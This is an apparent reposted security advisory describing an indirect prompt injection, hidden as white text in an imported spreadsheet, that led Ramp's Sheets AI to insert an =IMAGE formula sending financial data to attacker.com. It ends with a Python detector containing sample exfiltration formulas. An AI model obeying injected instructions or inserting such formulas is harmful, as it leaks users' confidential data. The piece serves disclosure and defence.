Ramp's Sheets AI Exfiltrates Financials

Original link: https://www.promptarmor.com/resources/ramps-sheets-ai-exfiltrates-financials

Ramp's Sheets AI, a tool similar to Claude for Excel, was found to have a data exfiltration vulnerability that is triggered through a carefully hidden prompt injection. PromptArmor researchers found that a malicious formula could be inserted into a user's spreadsheet, without user approval, when the user imports a compromised dataset from an untrusted external source. The injection manipulates the AI into collecting sensitive financial data and embedding it in an `IMAGE` formula, which triggers a network request to an attacker-controlled server, effectively leaking the confidential information. The vulnerability exploits the AI's ability to edit spreadsheets and insert formulas automatically. Ramp's security team fixed the issue on March 16, 2026, following responsible disclosure by PromptArmor. The incident echoes a similar risk previously found in Claude for Excel, which Anthropic addressed by displaying a prominent warning whenever a formula capable of making external network requests is inserted. It underlines the importance of robust security measures in agentic AI tools that handle sensitive data.


Original article

This vulnerability was responsibly disclosed to Ramp, and Ramp’s security team has indicated the issue was resolved on March 16, 2026.

Ramp's Sheets AI Exfiltrates Financials

Ramp's Sheets AI is an agentic product that helps users operate on spreadsheets, comparable to Claude for Excel. The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication.

Ramp’s security team has indicated that, following our report, the issue was resolved. We appreciate Ramp’s dedication to maintaining a strong AI security posture and addressing vulnerabilities as they arise. Further details on the responsible disclosure are at the end of the article.

In this article, we demonstrate that an indirect prompt injection concealed in an untrusted, externally sourced dataset could trigger the exfiltration of confidential financial data from the user’s workspace by manipulating Ramp’s AI to insert a malicious formula. No user approval is required.

PromptArmor identified a very similar risk in Claude for Excel – details on the remediations applied by Anthropic are at the bottom of the article.

  1. The user opens a workbook containing a confidential financial model

    A financial model is opened in Ramp AI Sheets.
  2. The user imports an external dataset to complement their model

    A spreadsheet containing industry growth statistics is imported into a separate tab from the financial model. The user aims to compare their company’s growth to industry benchmarks. The reference dataset comes from an untrusted external source, e.g., a website, an email, or a shared drive.

    An external reference dataset is added to the workbook.
  3. The reference dataset contains a concealed prompt injection

    A reference dataset contains an indirect prompt injection.

    An indirect prompt injection is hidden in white-on-white text, and is crafted to manipulate Ramp’s AI to:
    (1) collect sensitive data
    (2) generate a formula with that data that will make an external network request
    (3) insert that formula automatically into a user’s spreadsheet.

  4. The user asks Ramp AI to compare their financial model against the industry statistics

    The user submits a benign query to Ramp AI.
  5. Ramp AI falls for the prompt injection and inserts a malicious formula

    Ramp AI is manipulated into building an IMAGE formula that uses an attacker’s URL and appends the victim’s sensitive data to the end of the link.

    =IMAGE("https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}")

    A malicious formula is inserted by Ramp AI, exfiltrating financials.
  6. The malicious formula makes a network request, exfiltrating financial data

    Ramp AI inserts the malicious formula without requiring any user approval. The malicious formula triggers a network request to the attacker’s server. This network request exposes the sensitive financial data that was in the initial confidential “Financial Model” sheet (which Ramp AI included in the formula due to the attacker’s prompt injection).

    Below, the attacker’s server logs display the victim’s sensitive financial data:

    Financial data is exfiltrated by Ramp AI to the attacker's server.

Responsible Disclosure

The PromptArmor Threat Intel Team responsibly disclosed this vulnerability to Ramp. Ramp's security team indicated that the issue was resolved on March 16, 2026.

Timeline

Feb 19, 2026 PromptArmor discloses via [email protected]
Feb 27, 2026 PromptArmor follows up
Mar 13, 2026 PromptArmor follows up
Mar 14, 2026 Ramp confirms receipt of report; notes that the initial report was submitted during a transition period between disclosure programs, explaining the delay in initial response.
Mar 16, 2026 Ramp states: “Thank you again for your report. This issue was resolved earlier today at approximately noon eastern time.”

How Claude for Excel Remediated

When Claude for Excel was released, PromptArmor identified a nearly identical risk – malicious formulas could trigger data exfiltration without users being presented an adequate opportunity for informed human review.

Claude in Excel improved human-in-the-loop protections.

Note: Claude for Excel did leverage human-in-the-loop, but malicious formulas were not visible in the editing approval prompt, thereby impairing the protection's efficacy.

Anthropic updated Claude for Excel to display a red warning interstitial when a formula that can cause external network traffic is being inserted. The new warning displays the full formulas being inserted, and the documentation was updated to better inform users of the risk.
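As an added example (not PromptArmor's, Ramp's or Anthropic's code), here is the kind of pre-insertion gate the remediation above describes: it flags any agent-generated formula that can make a network request, with the reasons a reviewer needs to see (external host, long query string, URL assembled from cell references), and it scans an imported tab for the white-on-white text used to conceal the injection in step 3. The function set, the hosts and the sample formulas are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Functions that reach the network when evaluated (assumed, illustrative set,
# not Ramp's; extend it for the product being protected).
NETWORK_FUNCTIONS = {"IMAGE", "IMPORTDATA", "IMPORTXML", "IMPORTHTML", "WEBSERVICE", "HYPERLINK"}
CONCAT_FUNCTIONS = {"CONCATENATE", "CONCAT", "TEXTJOIN"}
STRING_RE = re.compile(r'"[^"]*"')
FUNC_RE = re.compile(r'\b([A-Z][A-Z0-9_.]*)\s*\(')
URL_RE = re.compile(r'https?://[^\s"\')]+', re.IGNORECASE)
MAX_QUIET_QUERY = 32  # query strings longer than this are flagged

def review_formula(formula, allowed_hosts=frozenset()):
    """Gate for an agent's formula insertions: returns the reasons the formula
    needs human review; an empty list means no network-capable content."""
    if not formula.startswith("="):
        return []
    skeleton = STRING_RE.sub('""', formula).upper()  # string literals blanked
    funcs = set(FUNC_RE.findall(skeleton))
    if not funcs & NETWORK_FUNCTIONS:
        return []
    reasons = []
    urls = URL_RE.findall(formula)
    if not urls:
        reasons.append("target URL is not a literal; resolved at evaluation time")
    for url in urls:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if host not in allowed_hosts:
            reasons.append(f"external host {host!r}")
        if len(parts.query) > MAX_QUIET_QUERY:
            reasons.append(f"{len(parts.query)}-byte query string")
    # "&" or a concat function outside string literals means the URL is
    # assembled from cell contents, so the values sent are not visible here.
    if "&" in skeleton or funcs & CONCAT_FUNCTIONS:
        reasons.append("URL built dynamically from cell references")
    return reasons

def hidden_text_cells(cells):
    """Refs of non-empty cells whose font colour equals the fill colour (the
    white-on-white concealment); cells are dicts with ref/value/font/fill."""
    return [c["ref"] for c in cells
            if c["value"].strip() and c["font"].lower() == c["fill"].lower()]

# Constructed samples mirroring the page's IMAGE formula, placeholder host.
SAMPLE_FORMULAS = {
    "B2": "=SUM(Model!C2:C13)",
    "B3": '=IMAGE("https://attacker.example/visualize.png?rev=1200000&ebitda=-340000&cash=5100000")',
    "B4": '=HYPERLINK("https://attacker.example/v?d=" & Model!C2, "chart")',
    "B5": '=IMAGE("https://cdn.corp.example/logo.png")',
}
```

Any non-empty list returned by `review_formula` should block the silent insertion and surface the full formula text to the user, which is what the red interstitial described above does.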
